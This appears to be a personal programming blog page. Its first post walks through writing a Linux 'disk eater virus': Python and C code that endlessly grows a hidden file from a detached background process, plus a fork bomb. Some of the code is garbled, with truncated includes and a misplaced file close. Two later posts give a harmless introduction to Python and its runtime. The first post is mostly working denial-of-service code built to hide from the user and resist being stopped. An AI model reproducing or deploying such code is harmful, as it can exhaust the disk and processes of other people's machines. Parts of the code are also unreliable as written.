Neeraj's Blog

There is always an open source solution..

Hard Disk Space Eating virus for Linux

While browsing, i stuck on the word disk space eating virus.. This virus gradually eats all the free space in our hard disk. There were so many codes but all of them was complicated and for windows.. But my intention was not to crack the system, but only to hack it. So i decided to make a disk eater for linux. I asked tony about this disk eater virus. He gave me the idea of creating a gradually growing file with simple random function. So i decided to check it out. Wrote a python code for create a continuous growing hidden file using random function. The code is given below.

import random

  def get_random_word(wordLen):
  word = ''
  for i in range(wordLen):
    word += random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz')
  return word

def main():
  fout = open('.wordlist.txt' , 'w')
  i = 1
  while True:
    wordLen = random.randint(500,1500)
    word  = get_random_word(wordLen)
    if i % 500000 == 0:
      fout.close()
      fout = open('.wordlist.txt' , 'a')
      print i
      i = 1
    fout.write(word+"\n")
    i += 1
    fout.close()
if __name__ == "__main__":
main()

Run this code creates a hidden file named .wordlist.txt.This file will continuously grow on size until you stop running that code. You can check the file size and can see that it is growing constantly. But the problem with this code was we can see that the process is running, and to keep a terminal always for running this process. Pressing ctrl+c will kill this virus. So to make the virus more interesting i have avoid this. I know that it can be done only using thread, but how? Again i googled it. So i stuck on another most common simple virus, fork bomb…

#include
int main()
{
    while(1)
    fork();
}

If you are running this code, the only way to get rid of it is, restarting your system.

But since i was not familiar with threads i asked tony for help. Then he told me about the orphans and also said that, for writing virus like stuff C will be better.

So we decided to code it in C. And our code is given below.

#include
#include
#include
int main()
{
  FILE *fd;
  int pid;
  int i;
  char buf[4096];
  buf[0] = 1;
  for(i = 1; i <= 4096; i++) {
buf[i] = (char) i;
}
  buf[4095] = '\0';
  if((fd = fopen(".abc.txt", "w")) == NULL) {
    perror("open");
    exit(errno);
  }
  fputs(buf,stdout);
  if((pid = fork()) < 0) {
    perror("fork");
    exit(errno);
  }
  if(pid == 0) {
    while(1) {
      if(fputs(buf,fd) == EOF) {
        perror("write");
        exit(errno);
      }
      fclose(fd);
      if((fd = fopen(".abc.txt", "a")) == NULL) {
        perror("open1");
        exit(errno);
      }
    }
  }
}    

This is our Disk Eater Virus..

If you run this code it will show you some junk, and will exit. But actually it will not. In background the child process will run creating a file named .abc.txt. You can see the process running by using the command ps -ax .Checking the file size shows you that how fast it is growing. It is much faster than the previous python code. The way to stop  that code is kill that process, by the command killall -9 a.out.

Advertisements

Python Run time structure

Actually all the complexities in running a python code is deliberately hidden from the programmers. We type code into text files, and run those files through the interpreter. But something more  is happening. The basic understanding of the run time structure of python can help to understand a detailed picture of program execution.

First the python script is compiled to byte code and then routed to a virtual machine.

Byte code compilation

Python first compiles the source code of the program to “byte  code“. Byte code is low level, platform independent representation of the source code. Byte code run more quickly than the source code. Python does not need to reanalyze and reparse each source statement repeatedly. The net effect is that pure Python code runs at speeds somewhere between those of a traditional compiled language and a traditional interpreted language. Python will store the byte code wit a .pyc (means compiled .py source) extension. When we run the source code for the second time, python will load the byte code, skips the compilation step unless we have not change the code.

Python Virtual Machine (PVM)

Once your byte code is formed, then it is carried to python virtual machine for execution. PVM is a big loop that iterates through the byte code instructions, one by one to carry out their operations. PVM is run time of engine of python. It is the component that actually runs the code.

Python’s traditional runtime execution model: source code you type is translated to byte code, which is then run by the Python Virtual Machine. Your code is automatically compiled, but then it is interpreted.

Python-Introduction

Python is a programming language that lets you work more quickly and more effectively. Python creator Guido van Rossum named this language after the BBC comedy series Monty Python’s Flying Circus. He is a big fan of Monty Python. Python language is easier to learn, understand and remember.  Its simple syntax, dynamic typing, lack of compile steps, and built-in toolset allow programmers to develop programs quickly. Python is not only a scripting language, but also a general-purpose language. It is also object oriented language. Python is an open source system. So it has a large and active development community that responds to issues and develop enhancements.

Python’s some top technical features are :

It’s Object-Oriented:

Its class model supports polymorphism, inheritance, operator-overloading,  and multiple-inheritance etc. even though with python’s simle syntaxand typing.

It’s Free:

Python is completely free to use and distribute.

It’s Potable:

The standard implementation of python is written in portable ANSI C, and it compiles and runs on virtually every major platform currently in use.

It’s Powerfull:

Python provides all the simplicity and ease of use of a scripting language, along with more advanced software-engineering tools typically found in compiled languages. This combination makes it useful for large-scale development projects.

Here are some of the main things in Python’s toolbox:

  • Dynamic Typing: Python keeps track of the kinds of objects your program uses when it runs; it doesn’t require complicated type and size declarations in your code. Python code does not constrain data types.
  • Automatic memory management: Python automatically allocates objects and reclaims (“garbage collects”) them when they are no longer used, and most can grow and shrink on demand. Python keeps track of low-level memory details so we don’t have to.
  • Programming-in-the-large support: For building larger systems, Python includes tools such as modules, classes, and exceptions.
  • Built-in object types: Python provides commonly used data structures such as lists, dictionaries, and strings as intrinsic parts of the language; as we’ll see, they’re both flexible and easy to use.
  • Built-in tools: To process all those object types, Python comes with powerful and standard operations, including concatenation (joining collections), slicing (extracting sections), sorting, mapping, and more.
  • Library utilities: For more specific tasks, Python also comes with a large collection of precoded library tools that support everything from regular expression matching to networking.
  • Third-party utilities: Because Python is open source, developers are encouraged to contribute precoded tools that support tasks beyond those supported by its built-ins.

Post Navigation